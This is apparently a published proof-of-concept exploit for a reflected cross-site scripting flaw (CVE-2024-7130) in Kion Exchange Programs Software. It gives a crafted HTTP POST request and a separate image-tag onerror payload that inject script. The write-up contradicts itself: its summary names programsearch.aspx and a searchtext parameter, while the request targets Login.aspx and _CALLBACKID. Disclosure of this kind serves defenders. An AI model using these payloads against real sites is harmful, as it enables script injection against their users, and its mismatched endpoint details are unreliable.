# Exploit Title: Kion Exchange Programs Software Reflected XSS
# CVE: CVE-2024-7130
# PoC-Date: 2025-05-28
# Exploit Author: Kutay ERGEN
# Vendor Homepage: https://www.kionexchangeprograms.com
# Version: <= 1.21.9092.29966
# Tested on: Chrome 124, Firefox 125
# CVSS Score: 5.5 (Medium)
# CWE: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
# Educational Use Only: This PoC is published for academic research and testing purposes only. Unauthorized use is strictly prohibited.

## Vulnerability Summary:
The Kion Exchange Programs Software is affected by a Reflected Cross-Site Scripting (XSS) vulnerability in the programsearch.aspx endpoint. The searchtext query parameter fails to sanitize input, allowing attackers to inject arbitrary HTML/JS code.

## Proof of Concept:
POST /Account/Login.aspx?pId= HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

_CALLBACKID=<img src=x onerror=alert('XSS');>&_CALLBACKPARAM=c0:resetPassword

Payload:
#<img src=M onerror=alert(1);>